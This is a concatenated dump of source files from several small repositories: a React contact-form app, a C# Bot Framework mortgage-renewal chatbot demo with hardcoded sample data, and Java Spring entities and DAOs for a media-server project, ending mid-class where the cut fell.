updateState = (e) => {
console.log(e.target.value);
this.setState({
[e.target.id]: e.target.value
});
};
render() {
const { editid } = this.props.match.params;
// contacts[contactIndex].name
return (
<Consumer>
{value => {
const { contacts, dispatch } = value;
let contactIndex;
contacts.forEach((row, index) => {
if (row.id == editid) {
contactIndex = index;
if (this.flag === true) {
this.updateFirstState(row.name, row.phone);
}
}
});
const { name, phone, error } = this.state;
console.log(contactIndex);
return (
<React.Fragment>
<br />
<div className="container text-right" style={{ direction: 'rtl' }}>
<form action="#" onSubmit={this.onSubmitEditContact.bind(this, editid, dispatch)}>
<InputDryCode
type="text"
id="name"
value={name}
onChange={this.updateState}
label={"نام"}
error={error.name}
/>
<InputDryCode
type="text"
id="phone"
value={phone}
onChange={this.updateState}
label={"تلفن"}
error={this.state.error.phone}
/>
<button type="submit" className="btn btn-primary">اصلاح</button>
</form>
</div>
<br />
</React.Fragment>
);
}
}
</Consumer>
);
}
}
export default Edit<file_sep>/src/components/header/Header.js
import React, { Component } from 'react';
import { Consumer } from '../../context';
import InputDryCode from './InputDryCode';
import uuid from 'uuid';
class Headers extends Component {
state = {
name: "",
phone: "",
error: {}
};
updateState = (e) => {
this.setState({
[e.target.id]: e.target.value
});
};
onSubmitContact = (callback, e) => {
e.preventDefault();
if (this.state.name === "") {
this.setState({
error: {
name: "نام باید وارد شود",
}
});
return;
}
if (this.state.phone === "") {
this.setState({
error: {
phone: "موبایل باید وارد شود",
}
});
return;
}
const newContact = {
id: uuid(),
name: this.state.name,
phone: this.state.phone,
}
const action = {
type: 'ADD_CONTACT',
payload: newContact,
}
callback(action);
this.setState({
name: '',
phone: '',
error: {}
})
this.props.history.push("/details");
}
render() {
const { name, phone, error } = this.state;
return (
<Consumer >
{value => {
const { dispatch } = value;
return (
<React.Fragment>
<br />
<div className="container text-right" style={{ direction: 'rtl' }}>
<form action="#" onSubmit={this.onSubmitContact.bind(this, dispatch)}>
<InputDryCode
type="text"
id="name"
value={name}
onChange={this.updateState}
label={"نام"}
error={error.name}
/>
<InputDryCode
type="text"
id="phone"
value={phone}
onChange={this.updateState}
label={"تلفن"}
error={this.state.error.phone}
/>
<button type="submit" className="btn btn-primary">افزودن</button>
</form>
</div>
<br />
</React.Fragment>
)
}
}
</Consumer>
);
}
}
export default Headers;
<file_sep>/src/components/pages/notFound.js
import React from 'react'
export default function notFound() {
return (
<div className="container text-right" >
<h1>
<span className="text-danger">404 not found</span>
<h1 className="mt-5" style={{ direction: 'rtl' }}>متاسفانه صفحه ی مورد نظر یافت نشد.</h1>
</h1>
</div>
)
}
<file_sep>/src/components/pages/apiTest.js
import React, { Component } from 'react';
import axios from 'axios';
export default class apiTest extends Component {
state = {
}
componentDidMount() {
axios.get('https://api.github.com/users/zerovan')
.then(res => console.log(res));
}
render() {
return (
<div>
in test
</div>
)
}
}
| f35a70a294b1522317de2bb4c29676b7650357df | [
"JavaScript"
] | 6 | JavaScript | zerovan/reactProject | ebecb3b95e9a3c6015e6aca02889258f614c44af | c772b82c0261fac6e663e64631a4f1bc47d08f48 |
refs/heads/master | <file_sep>namespace BasicBot.Models
{
public enum MortgageType
{
Variable,
Fixed2Years,
Fixed5Years
}
}
<file_sep>// Copyright (c) Microsoft Corporation. All rights reserved.
// Licensed under the MIT License.
// See https://github.com/microsoft/botbuilder-samples for a more comprehensive list of samples.
using System.Linq;
using System.Threading;
using System.Threading.Tasks;
using BasicBot;
using BasicBot.Dialog;
using Microsoft.Bot.Builder;
using Microsoft.Bot.Schema;
using Microsoft.Extensions.Logging;
namespace Microsoft.BotBuilderSamples
{
/// <summary>
/// Main entry point and orchestration for bot.
/// </summary>
public class BasicBot : IBot
{
// Supported LUIS Intents
public const string GreetingIntent = "Greeting";
public const string CancelIntent = "Cancel";
public const string HelpIntent = "Help";
public const string NoneIntent = "None";
/// <summary>
/// Key in the bot config (.bot file) for the LUIS instance.
/// In the .bot file, multiple instances of LUIS can be configured.
/// </summary>
public static readonly string LuisConfiguration = "BasicBotLuisApplication";
private readonly BotServices _services;
private readonly ILogger<BasicBot> _logger;
private readonly BotAccessors _accessors;
private readonly SavingsDialogs _dialogs;
/// <summary>
/// Initializes a new instance of the <see cref="BasicBot"/> class.
/// </summary>
/// <param name="botServices">Bot services.</param>
public BasicBot(BotAccessors accessors, ILoggerFactory loggerFactory)
{
_logger = loggerFactory.CreateLogger<BasicBot>();
_logger.LogTrace("EchoBot turn start.");
_accessors = accessors;
_dialogs = new SavingsDialogs(_accessors.DialogStateAccessor);
}
public async Task OnTurnAsync(ITurnContext turnContext, CancellationToken cancellationToken = default(CancellationToken))
{
var dc = await _dialogs.CreateContextAsync(turnContext, cancellationToken);
if (turnContext.Activity.Type == ActivityTypes.Message)
{
await dc.ContinueDialogAsync(cancellationToken);
if (!turnContext.Responded)
{
await dc.BeginDialogAsync(SavingsDialogs.MainMenu, null, cancellationToken);
}
}
else if (turnContext.Activity.Type == ActivityTypes.ConversationUpdate)
{
var activity = turnContext.Activity.AsConversationUpdateActivity();
if (activity.MembersAdded.Any(member => member.Id != activity.Recipient.Id))
{
await dc.BeginDialogAsync(SavingsDialogs.MainMenu, null, cancellationToken);
}
}
await _accessors.ConversationState.SaveChangesAsync(turnContext, false, cancellationToken);
}
}
}
<file_sep>using System;
using System.Collections.Generic;
namespace BasicBot.Models
{
public static class CustomerData
{
private static IDictionary<string, Mortgage> data = new Dictionary<string, Mortgage>
{
{
"<EMAIL>",
new Mortgage { Type = MortgageType.Variable, IsUpForRenewal = true, Balance = 123500M, InterestRate = 3.99M, Term = 23, Description = "SVR 3.99%" }
},
};
public static Tuple<Mortgage, IEnumerable<Mortgage>> Find(string username)
{
var current = data[username];
return new Tuple<Mortgage, IEnumerable<Mortgage>>(current, GetDeals(current));
}
private static IEnumerable<Mortgage> GetDeals(Mortgage currentMortgage)
{
if (currentMortgage.IsUpForRenewal)
{
return new[]
{
new Mortgage
{
Balance = currentMortgage.Balance,
Term = currentMortgage.Term - 7,
IsUpForRenewal = false,
InterestRate = 1.35M,
Type = MortgageType.Fixed2Years,
Description = string.Format("Fixed 2 years 1.35%"),
}
};
}
else
{
return null;
}
}
}
}
<file_sep>using System.Collections.Generic;
using System.Linq;
using System.Threading;
using System.Threading.Tasks;
using BasicBot.Models;
using Microsoft.Bot.Builder;
using Microsoft.Bot.Builder.Dialogs;
using Microsoft.Bot.Builder.Dialogs.Choices;
using Microsoft.Bot.Schema;
namespace BasicBot.Dialog
{
/// <summary>Contains the set of dialogs and prompts for the hotel bot.</summary>
public class SavingsDialogs : DialogSet
{
/// <summary>The ID of the top-level dialog.</summary>
public const string MainMenu = "mainMenu";
public SavingsDialogs(IStatePropertyAccessor<DialogState> dialogStateAccessor)
: base(dialogStateAccessor)
{
Add(new ChoicePrompt(Inputs.Choice));
Add(new NumberPrompt<int>(Inputs.Number));
// Define the steps for and add the main welcome dialog.
WaterfallStep[] welcomeDialogSteps = new WaterfallStep[]
{
MainDialogSteps.PresentMenuAsync,
MainDialogSteps.ProcessInputAsync,
MainDialogSteps.RepeatMenuAsync,
};
Add(new WaterfallDialog(MainMenu, welcomeDialogSteps));
// Define the steps for and add the reserve-table dialog.
WaterfallStep[] remindLaterSteps = new WaterfallStep[]
{
RemindLaterSteps.StubAsync,
};
Add(new WaterfallDialog(Dialogs.RemindLater, remindLaterSteps));
WaterfallStep[] bestDealSteps = new WaterfallStep[]
{
BestDealSteps.ShowBestDealAsync,
BestDealSteps.ProcessInputAsync,
BestDealSteps.RepeatMenuAsync,
};
Add(new WaterfallDialog(Dialogs.Renew, bestDealSteps));
}
/// <summary>Contains the IDs for the other dialogs in the set.</summary>
private static class Dialogs
{
public const string Renew = "renew";
public const string Explore = "explore";
public const string RemindLater = "later";
public const string ApplyOnline = "applyOnline";
public const string CallBack = "callBack";
}
/// <summary>Contains the IDs for the prompts used by the dialogs.</summary>
private static class Inputs
{
public const string Choice = "choicePrompt";
public const string Number = "numberPrompt";
}
/// <summary>Contains the keys used to manage dialog state.</summary>
private static class Outputs
{
public const string GivenName = "givenName";
public const string UserName = "username";
public const string CurrentMortgage = "CurrentMortgage";
public const string AvailableDeals = "AvailableDeals";
}
/// <summary>Describes an option for the top-level dialog.</summary>
private class WelcomeChoice
{
/// <summary>Gets or sets the text to show the guest for this option.</summary>
public string Description { get; set; }
/// <summary>Gets or sets the ID of the associated dialog for this option.</summary>
public string DialogName { get; set; }
}
/// <summary>Contains the lists used to present options to the guest.</summary>
private static class Lists
{
/// <summary>Gets the options for the top-level dialog.</summary>
public static List<WelcomeChoice> WelcomeOptions { get; } = new List<WelcomeChoice>
{
new WelcomeChoice { Description = "Apply now", DialogName = Dialogs.ApplyOnline },
new WelcomeChoice { Description = "View details", DialogName = Dialogs.Renew },
new WelcomeChoice { Description = "Remind me later", DialogName = Dialogs.RemindLater },
};
private static readonly List<string> _welcomeList = WelcomeOptions.Select(x => x.Description).ToList();
/// <summary>Gets the choices to present in the choice prompt for the top-level dialog.</summary>
public static IList<Choice> WelcomeChoices { get; } = ChoiceFactory.ToChoices(_welcomeList);
/// <summary>Gets the reprompt action for the top-level dialog.</summary>
public static Activity WelcomeReprompt
{
get
{
var reprompt = MessageFactory.SuggestedActions(_welcomeList, "Please choose an option");
reprompt.AttachmentLayout = AttachmentLayoutTypes.List;
return reprompt as Activity;
}
}
public static Activity WelcomePrompt
{
get
{
var reprompt = MessageFactory.SuggestedActions(_welcomeList, "How would you like to continue?");
reprompt.AttachmentLayout = AttachmentLayoutTypes.List;
return reprompt as Activity;
}
}
/// <summary>Gets the options for the food-selection dialog.</summary>
public static List<WelcomeChoice> BestDealOptions { get; } = new List<WelcomeChoice>
{
new WelcomeChoice { Description = "Apply online", DialogName = Dialogs.ApplyOnline },
new WelcomeChoice { Description = "Call me", DialogName = Dialogs.CallBack },
};
private static readonly List<string> _bestDealList = BestDealOptions.Select(x => x.Description).ToList();
/// <summary>Gets the choices to present in the choice prompt for the food-selection dialog.</summary>
public static IList<Choice> BestDealChoices { get; } = ChoiceFactory.ToChoices(_bestDealList);
/// <summary>Gets the reprompt action for the food-selection dialog.</summary>
public static Activity BestDealReprompt
{
get
{
var reprompt = MessageFactory.SuggestedActions(_bestDealList, "Please choose an option");
reprompt.AttachmentLayout = AttachmentLayoutTypes.List;
return reprompt as Activity;
}
}
public static Activity BestDealPrompt
{
get
{
var reprompt = MessageFactory.SuggestedActions(_bestDealList, "How would you like to continue?");
reprompt.AttachmentLayout = AttachmentLayoutTypes.List;
return reprompt as Activity;
}
}
}
/// <summary>
/// Contains the waterfall dialog steps for the order-dinner dialog.
/// </summary>
private static class MainDialogSteps
{
public static async Task<DialogTurnResult> PresentMenuAsync(
WaterfallStepContext stepContext,
CancellationToken cancellationToken)
{
var username = "<EMAIL>";
var givenname = "Stephen";
var deals = CustomerData.Find(username);
var activity = new Activity();
activity.Type = ActivityTypes.Typing;
activity.Text = "";
await stepContext.Context.SendActivityAsync("Hi " + givenname + "!");
await stepContext.Context.SendActivityAsync(activity);
Thread.Sleep(2000);
await stepContext.Context.SendActivityAsync("We are analysing your current mortgage deal and spending patterns.");
await stepContext.Context.SendActivityAsync(activity);
Thread.Sleep(3000);
await stepContext.Context.SendActivityAsync("Great news! Your house value went **up by 17%**.");
await stepContext.Context.SendActivityAsync(activity);
Thread.Sleep(1000);
stepContext.Values[Outputs.GivenName] = givenname;
stepContext.Values[Outputs.UserName] = username;
stepContext.Values[Outputs.CurrentMortgage] = deals.Item1;
stepContext.Values[Outputs.AvailableDeals] = deals.Item2;
// Greet the guest and ask them to choose an option.
await stepContext.Context.SendActivityAsync(
ProcessDeals(username),
cancellationToken: cancellationToken);
return await stepContext.PromptAsync(
Inputs.Choice,
new PromptOptions
{
Prompt = Lists.WelcomePrompt,
RetryPrompt = Lists.WelcomeReprompt,
Choices = Lists.WelcomeChoices,
},
cancellationToken);
}
public static async Task<DialogTurnResult> ProcessInputAsync(
WaterfallStepContext stepContext,
CancellationToken cancellationToken)
{
// Begin a child dialog associated with the chosen option.
var choice = (FoundChoice)stepContext.Result;
var dialogId = Lists.WelcomeOptions[choice.Index].DialogName;
if (dialogId == Dialogs.ApplyOnline)
{
await stepContext.Context.SendActivityAsync("Thank you. [Click here](https://personal.rbs.co.uk/personal/mortgages/secure/mortgage-agreement-in-principle.html) to complete your paperless application today.", cancellationToken: cancellationToken);
return await stepContext.CancelAllDialogsAsync(cancellationToken);
}
return await stepContext.BeginDialogAsync(dialogId, stepContext.Values, cancellationToken);
}
public static async Task<DialogTurnResult> RepeatMenuAsync(
WaterfallStepContext stepContext,
CancellationToken cancellationToken)
{
// Start this dialog over again.
return await stepContext.ReplaceDialogAsync(MainMenu, null, cancellationToken);
}
private static string ProcessDeals(string username)
{
var customerData = CustomerData.Find(username);
var maxSavingDeal = customerData.Item2.OrderBy(m => m.TotalRepayment).First();
return string.Format("For **just £{0:0}** extra per month, you can **save up to £{1:0}k** and reduce your term by {2} years.", maxSavingDeal.MonthlyRepayment - customerData.Item1.MonthlyRepayment, (customerData.Item1.TotalRepayment - maxSavingDeal.TotalRepayment) / 1000, customerData.Item1.Term - maxSavingDeal.Term);
}
}
/// <summary>
/// Contains the waterfall dialog steps for the reserve-table dialog.
/// </summary>
private static class RemindLaterSteps
{
public static async Task<DialogTurnResult> StubAsync(
WaterfallStepContext stepContext,
CancellationToken cancellationToken)
{
await stepContext.Context.SendActivityAsync(
"Come back any time, " + ((IDictionary<string, object>)stepContext.Options)[Outputs.GivenName] + "!",
cancellationToken: cancellationToken);
return await stepContext.CancelAllDialogsAsync(cancellationToken);
}
}
private static class BestDealSteps
{
public static async Task<DialogTurnResult> ShowBestDealAsync(
WaterfallStepContext stepContext,
CancellationToken cancellationToken)
{
var activity = new Activity();
activity.Type = ActivityTypes.Typing;
activity.Text = "";
await stepContext.Context.SendActivityAsync("Let me bring up your details, " + ((IDictionary<string, object>)stepContext.Options)[Outputs.GivenName], cancellationToken: cancellationToken);
await stepContext.Context.SendActivityAsync(activity);
Thread.Sleep(2000);
var currentDeal = (Mortgage)((IDictionary<string, object>)stepContext.Options)[Outputs.CurrentMortgage];
//await stepContext.Context.SendActivityAsync(
// string.Format("Your current mortgage balance is £{0:0.##}k and your current deal is {1}. You pay £{2:0.##} per month and it will take you {3} years to clear your balance, for a total cost of £{4:0.##}k.", currentDeal.Balance / 1000, currentDeal.Description, currentDeal.MonthlyRepayment, currentDeal.Term, currentDeal.TotalRepayment / 1000), cancellationToken: cancellationToken);
//await stepContext.Context.SendActivityAsync(activity);
//Thread.Sleep(2000);
var bestDeal = (((IDictionary<string, object>)stepContext.Options)[Outputs.AvailableDeals] as IEnumerable<Mortgage>).OrderBy(m => m.TotalRepayment).First();
//await stepContext.Context.SendActivityAsync(
// string.Format("By increasing your monthly payments to £{0:0.##} and reducing your term to {1} years, your total repayment cost could be as low as £{2:0.##}k, saving you up to £{3:0.##}k. This is a {4} deal.", bestDeal.MonthlyRepayment, bestDeal.Term, bestDeal.TotalRepayment / 1000, (currentDeal.TotalRepayment - bestDeal.TotalRepayment) / 1000, bestDeal.Description), cancellationToken: cancellationToken);
await stepContext.Context.SendActivityAsync(string.Format(@"| | Current | Our best offer |
| ----- | ----- | ----- |
| Deal | {0} | {1} |
| Monthly Rate | £{2:0} | £{3:0} |
| Term | {4} | {5} |
| Balance | £{6:0.##}k | £{7:0.##}k |
| Total Repayment | £{8:0.##}k | £{9:0.##}k |", currentDeal.Description,bestDeal.Description,currentDeal.MonthlyRepayment,bestDeal.MonthlyRepayment,currentDeal.Term,bestDeal.Term,currentDeal.Balance/1000,currentDeal.Balance/1000,currentDeal.TotalRepayment/1000,bestDeal.TotalRepayment/1000), cancellationToken: cancellationToken);
return await stepContext.PromptAsync(
Inputs.Choice,
new PromptOptions
{
Prompt = Lists.BestDealPrompt,
RetryPrompt = Lists.BestDealReprompt,
Choices = Lists.BestDealChoices,
},
cancellationToken);
}
public static async Task<DialogTurnResult> ProcessInputAsync(
WaterfallStepContext stepContext,
CancellationToken cancellationToken)
{
// Begin a child dialog associated with the chosen option.
var choice = (FoundChoice)stepContext.Result;
var dialogId = Lists.BestDealOptions[choice.Index].DialogName;
switch (dialogId)
{
case Dialogs.CallBack:
await stepContext.Context.SendActivityAsync("One of our advisers will be with you shortly, on your mobile banking registered phone number.", cancellationToken: cancellationToken);
break;
case Dialogs.ApplyOnline:
await stepContext.Context.SendActivityAsync("Thank you. [Click here](https://personal.rbs.co.uk/personal/mortgages/secure/mortgage-agreement-in-principle.html) to complete your paperless application today.", cancellationToken: cancellationToken);
break;
}
return await stepContext.CancelAllDialogsAsync(cancellationToken);
}
public static async Task<DialogTurnResult> RepeatMenuAsync(
WaterfallStepContext stepContext,
CancellationToken cancellationToken)
{
// Start this dialog over again.
return await stepContext.ReplaceDialogAsync(MainMenu, null, cancellationToken);
}
}
}
}
<file_sep>using System;
namespace BasicBot.Models
{
public class Mortgage
{
public MortgageType Type { get; set; }
public bool IsUpForRenewal { get; set; }
public string Description { get; set; }
public decimal Balance { get; set; }
public decimal InterestRate { get; set; }
public int Term { get; set; }
public decimal MonthlyRepayment
{
get
{
return (decimal)((double)Balance * (double)InterestRate / 1200.0 * (Math.Pow(1 + ((double)InterestRate / 1200), Term * 12) / (Math.Pow(1 + ((double)InterestRate / 1200), Term * 12) - 1)));
}
}
public decimal AnnualRepayment
{
get
{
return MonthlyRepayment * 12.0M;
}
}
public decimal TotalRepayment
{
get
{
return AnnualRepayment * Term;
}
}
}
}
| 20186d46b98f78054e81afa5a6a9ffb503f61a51 | [
"C#"
] | 5 | C# | gabi-radu/milly | 9eeb27d84a79ad6f8dccfcc1f0ba7e2e6409040b | 7cae1111db696c5b1ba9d24fdaebd8e2f4f639d8 |
refs/heads/main | <repo_name>AndreaGonzalez14/node-tabla-multiplicar<file_sep>/app.js
//Path relativo
//const multiplicar = require('./multiplicar/multiplicar')
const { alias } = require('yargs');
const { crearArchivo, listarTabla } = require('./multiplicar/multiplicar')
const yarg = require('./config/yargs').argv;
let comando = yarg._[0]
switch (comando) {
case 'crear':
crearArchivo(yarg.base, yarg.limite).then(salida => {
console.log(salida);
}).catch(error => {
console.log(error);
})
break;
case 'imprimir':
listarTabla(yarg.base, yarg.limite).catch(error => {
console.log(error);
})
break;
default:
break;
}
/* let base = argv.base;
crearArchivo(base).then(salida => {
console.log(salida);
}).catch(error => {
console.log(error);
}) */ | 1d2825a386124dc7b6e9e38427024705977e5a0e | [
"JavaScript"
] | 1 | JavaScript | AndreaGonzalez14/node-tabla-multiplicar | eb5e99b26e122798a9078083ecae298e0124bf56 | ae75c36c0ff0a778901df71f9138433e90735a0b |
refs/heads/main | <repo_name>ClaudioTanca/bike-index-app<file_sep>/src/models/bikeCountResponse.ts
export interface BikeCountResponse {
non: number;
stolen: number;
proximity: number;
}<file_sep>/src/store/index.ts
import { configureStore } from '@reduxjs/toolkit';
import { bikeFeature } from '../features/bikes/bike.slice';
import paginationReducer from "../features/pagination/pagination.slice";
import searchReducer from '../features/search/search.slice'
export const store = configureStore({
reducer: {
[bikeFeature.reducerPath]: bikeFeature.reducer,
pagination: paginationReducer,
search: searchReducer
},
middleware: (defaultMiddleware) => {
return defaultMiddleware().concat(bikeFeature.middleware)
}
});
export type AppDispatch = typeof store.dispatch;
export type RootState = ReturnType<typeof store.getState>;<file_sep>/src/features/bikes/bike.slice.ts
import { createApi, fetchBaseQuery } from "@reduxjs/toolkit/query/react";
import {BASE_URL, BERLIN_LOCATION} from "../../utils/const";
import {Bike, BikeCountRequest, BikeCountResponse, BikeSearchRequest} from '../../models';
import {asUrParams} from "../../utils/functions";
export const bikeFeature = createApi({
reducerPath: 'bikes',
baseQuery: fetchBaseQuery({
baseUrl: BASE_URL
}),
endpoints: (builder) => {
return {
getBikes: builder.query<Bike[], BikeSearchRequest | void>({
query({page = 1, per_page = 10, stolenness = "proximity", location = BERLIN_LOCATION, distance = "10", query}: BikeSearchRequest) {
const s = asUrParams({page, per_page, stolenness, location, distance, query});
return `/search?${s.toString()}`;
},
keepUnusedDataFor: 0,
transformResponse: (response: { bikes: Bike[] }): Bike[] | Promise<Bike[]> => response.bikes
}),
getBikesCount: builder.query<BikeCountResponse, BikeCountRequest | void>({
query({stolenness = "proximity", location = BERLIN_LOCATION, distance = "10", query}: BikeCountRequest) {
const s = asUrParams({stolenness, location, distance, query});
return `/search/count?${s.toString()}`;
},
keepUnusedDataFor: 0,
})
}
}
})
export const { useGetBikesQuery, useGetBikesCountQuery } = bikeFeature;<file_sep>/src/models/bikeComponent.ts
export interface BikeComponent {
id: number;
description: string;
serial_number: string;
component_type: string;
component_group: string;
rear?: any;
front?: any;
manufacturer_name: string;
model_name: string;
year?: number;
}<file_sep>/src/models/bikeStolenRecord.ts
export interface BikeStolenRecord {
date_stolen: number;
location: string;
latitude: number;
longitude: number;
theft_description: string;
locking_description: string;
lock_defeat_description: string;
police_report_number: string;
police_report_department: string;
created_at: number;
create_open311: boolean;
id: number;
}<file_sep>/src/utils/const.ts
export const BASE_URL = "https://bikeindex.org/api/v3";
export const BERLIN_LOCATION = "52.520008,13.404954";<file_sep>/src/models/bike.ts
import {BikeStolenRecord} from "./bikeStolenRecord";
import {BikeComponent} from "./bikeComponent";
import {BikeImage} from "./bikeImage";
export interface Bike {
date_stolen: number;
description: string;
frame_colors: string[];
frame_model: string;
id: number;
is_stock_img: boolean;
large_img: string;
location_found?: string;
manufacturer_name: string;
external_id?: any;
registry_name?: string;
registry_url?: string;
serial: string;
status?: any;
stolen: boolean;
stolen_location: string;
thumb: string;
title: string;
url: string;
year: number;
registration_created_at: number;
registration_updated_at: number;
api_url: string;
manufacturer_id: number;
paint_description?: string;
name: string;
frame_size: string;
rear_tire_narrow: boolean;
front_tire_narrow: boolean;
type_of_cycle: string;
test_bike: boolean;
rear_wheel_size_iso_bsd: number;
front_wheel_size_iso_bsd: number;
handlebar_type_slug: string;
frame_material_slug?: string;
front_gear_type_slug: string;
rear_gear_type_slug: string;
additional_registration: string;
stolen_record: BikeStolenRecord;
public_images: BikeImage[];
components: BikeComponent[];
}<file_sep>/src/utils/functions.ts
export function formatDate(source: number) {
const date = new Date(source * 1000);
return date.toLocaleDateString() + " at " + date.toLocaleTimeString();
}
export function asUrParams(source: any) {
const entries = Object.entries(source);
return entries.reduce((acc, curr) => {
const [key, value] = curr;
if(source[key]) {
// @ts-ignore
acc.set(key, value.toString());
}
return acc;
}, new URLSearchParams("")).toString();
}
export function range(size: number) {
return Array.from( {length: size}, (v, k)=>k+1);
}<file_sep>/src/models/bikeSearchResponse.ts
import {Bike} from "./bike";
export interface BikeSearchResponse {
bikes: Bike[]
}
export interface BikeSearchRequest {
page?: number;
per_page?: number;
location?: string;
distance?: string;
stolenness?: "all" | "non" | "stolen" | "proximity";
query?: string;
}
export interface BikeCountRequest {
location?: string;
distance?: string;
stolenness?: "all" | "non" | "stolen" | "proximity";
query?: string;
}<file_sep>/src/features/pagination/pagination.slice.ts
import {createSlice, PayloadAction} from "@reduxjs/toolkit";
export interface PaginationState {
currentPage: number,
pageCount: number,
pageSize: number
}
const initialState: PaginationState = {
currentPage: 1,
pageCount: 1,
pageSize: 10
}
const paginationSlice = createSlice({
name: 'pagination',
initialState,
reducers: {
goNext(state) {
state.currentPage++
},
goPrev(state) {
state.currentPage--
},
goFirst(state) {
state.currentPage = 1
},
goLast(state) {
state.currentPage = state.pageCount
},
setPageCount(state, action: PayloadAction<number>) {
state.pageCount = action.payload || 1;
}
}
})
export const { goFirst, goLast, goNext, goPrev, setPageCount } = paginationSlice.actions;
export default paginationSlice.reducer;<file_sep>/src/features/search/search.slice.ts
import {createSlice, PayloadAction} from "@reduxjs/toolkit";
interface SearchState {
query: string
}
const initialState: SearchState = {
query: ''
}
const searchSlice = createSlice({
name: 'search',
initialState,
reducers: {
setQuery(state, action: PayloadAction<string>) {
state.query = action.payload;
},
resetQuery(state) {
state.query = ''
}
}
});
export const { setQuery, resetQuery } = searchSlice.actions;
export default searchSlice.reducer;<file_sep>/src/models/index.ts
export * from './bike';
export * from './bikeImage';
export * from './bikeComponent';
export * from './bikeStolenRecord';
export * from './bikeCountResponse';
export * from './bikeSearchResponse';<file_sep>/src/models/bikeImage.ts
export interface BikeImage {
name: string;
full: string;
large: string;
medium: string;
thumb: string;
id: number;
}
| 847dd7868a075b26368cd950144b0fc2cb6ea868 | [
"TypeScript"
] | 13 | TypeScript | ClaudioTanca/bike-index-app | da26eb91efd5f11c4cd27afceca6d13b06c7432d | e07f5871f4e0b030d06715a18c689eb4926c0f1e |
refs/heads/master | <file_sep>## Projeto WhatsLab
> Este projeto é uma atividade proposta pela Labenu. Nosso objetivo é criar um sitefictício para um App de mensagens.
## 🤝 Membros do projeto
<NAME>
<NAME>
## Imagens



## ✅ O que está funcionando
As mensagens estão aparecendo na tela, o botão de enviar está funcionando, e está responsivo.
## 🌎 Como acessar o projeto
http://moldy-vein.surge.sh
<file_sep>import { render } from '@testing-library/react';
import React from 'react';
import styled from 'styled-components';
import Inputs from './components/inputs/inputs';
const MainContainer = styled.div`
display:flex;
justify-content: center;
align-items: center;
flex-direction: row;
height: 100vh;
background-color: #ededed;
width: 100vw;
`
function App() {
render()
return (
<MainContainer>
<Inputs />
</MainContainer>
);
}
export default App;
| 9e3d2775b77aeeb9611d38c1b4a5a49ffa334c77 | [
"Markdown",
"JavaScript"
] | 2 | Markdown | future4code/banu-whatslab1 | 6f7ec29f876b6ff21a46b16b75602d005d11a2c3 | 1a115df98a77f54d408916111e6c4514941c2231 |
refs/heads/master | <repo_name>Tomaltach/MediaServer<file_sep>/MediaCore/src/main/java/ie/tom/mediaserver/dao/mapper/BookMapper.java
package ie.tom.mediaserver.dao.mapper;
import ie.tom.mediaserver.entity.Book;
import java.sql.ResultSet;
import java.sql.SQLException;
import org.springframework.jdbc.core.RowMapper;
public class BookMapper implements RowMapper<Book> {
@Override
public Book mapRow(ResultSet rs, int i) throws SQLException {
Book b = new Book();
b.setBook_id(rs.getInt("book_id"));
b.setBook_name(rs.getString("book_name"));
b.setBook_genre(rs.getString("book_genre"));
b.setBook_year(rs.getInt("book_year"));
b.setBook_author(rs.getString("book_author"));
b.setFile_name(rs.getString("file_name"));
b.setFile_type(rs.getString("file_type"));
b.setFile_path(rs.getString("file_path"));
return b;
}
}
<file_sep>/README.md
# MediaServer
A media server to allow for a central hub of movies, music, books, etc. to be accessible from a webpage. This is going to be designed for what would be a local server, say a home media server, but will able to be used as a large site if wanted to.
<file_sep>/MediaCore/src/main/java/ie/tom/mediaserver/entity/Loan.java
package ie.tom.mediaserver.entity;
import java.util.Date;
import javax.persistence.Entity;
import javax.persistence.GeneratedValue;
import javax.persistence.GenerationType;
import javax.persistence.Id;
import javax.persistence.Table;
import javax.validation.constraints.NotNull;
import javax.xml.bind.annotation.XmlRootElement;
import org.springframework.format.annotation.DateTimeFormat;
@Entity
@XmlRootElement
@Table(name="loan")
public class Loan {
@Id
@GeneratedValue(strategy=GenerationType.IDENTITY)
private int loan_id;
@NotNull
private int member_id;
@NotNull
private int media_id;
@NotNull
@DateTimeFormat
private Date loan_date;
public int getLoan_id() {
return loan_id;
}
public void setLoan_id(int loan_id) {
this.loan_id = loan_id;
}
public int getMember_id() {
return member_id;
}
public void setMember_id(int member_id) {
this.member_id = member_id;
}
public int getMedia_id() {
return media_id;
}
public void setMedia_id(int media_id) {
this.media_id = media_id;
}
public Date getLoan_date() {
return loan_date;
}
public void setLoan_date(Date loan_date) {
this.loan_date = loan_date;
}
}<file_sep>/MediaCore/src/main/java/ie/tom/mediaserver/service/MemberService.java
package ie.tom.mediaserver.service;
import java.util.List;
import ie.tom.mediaserver.entity.Member;
import org.springframework.stereotype.Service;
import org.springframework.transaction.annotation.Propagation;
import org.springframework.transaction.annotation.Transactional;
@Service
@Transactional(propagation=Propagation.REQUIRED)
public interface MemberService {
void add(Member member);
void update(Member member);
void save(Member member);
void delete(Member member);
Member findMemberById(int member_id);
List<Member> findAllMembers();
List<Member> findAllOverdueMembers();
}
<file_sep>/MediaCore/src/main/java/ie/tom/mediaserver/dao/MemberDao.java
package ie.tom.mediaserver.dao;
import ie.tom.mediaserver.entity.Member;
import java.util.List;
import org.springframework.stereotype.Repository;
@Repository
public interface MemberDao {
void addMember(Member member);
void updateMember(Member member);
void saveMember(Member member);
void deleteMember(Member member);
Member findById(int member_id);
Member findByUserName(String userName);
List<Member> findByFirstName(String firstName);
List<Member> findByLastName(String lastName);
List<Member> findByEmail(String email);
List<Member> findAll();
}
<file_sep>/MediaCore/src/main/java/ie/tom/mediaserver/entity/Movie.java
package ie.tom.mediaserver.entity;
import javax.persistence.Entity;
import javax.persistence.GeneratedValue;
import javax.persistence.GenerationType;
import javax.persistence.Id;
import javax.persistence.Table;
import javax.validation.constraints.NotNull;
import javax.validation.constraints.Size;
import javax.xml.bind.annotation.XmlRootElement;
import org.hibernate.validator.constraints.NotEmpty;
@Entity
@XmlRootElement
@Table(name="movie")
public class Movie {
@Id
@GeneratedValue(strategy=GenerationType.IDENTITY)
private int movie_id;
@NotEmpty
@Size(min=4, max=50)
private String movie_name;
@NotEmpty
@Size(min=4, max=25)
private String movie_genre;
@NotNull
private int movie_year;
@NotEmpty
@Size(min=4, max=50)
private String file_name;
@NotEmpty
@Size(min=4, max=50)
private String file_type;
@NotEmpty
@Size(min=4, max=50)
private String file_path;
public int getMovie_id() {
return movie_id;
}
public void setMovie_id(int movie_id) {
this.movie_id = movie_id;
}
public String getMovie_name() {
return movie_name;
}
public void setMovie_name(String movie_name) {
this.movie_name = movie_name;
}
public String getMovie_genre() {
return movie_genre;
}
public void setMovie_genre(String movie_genre) {
this.movie_genre = movie_genre;
}
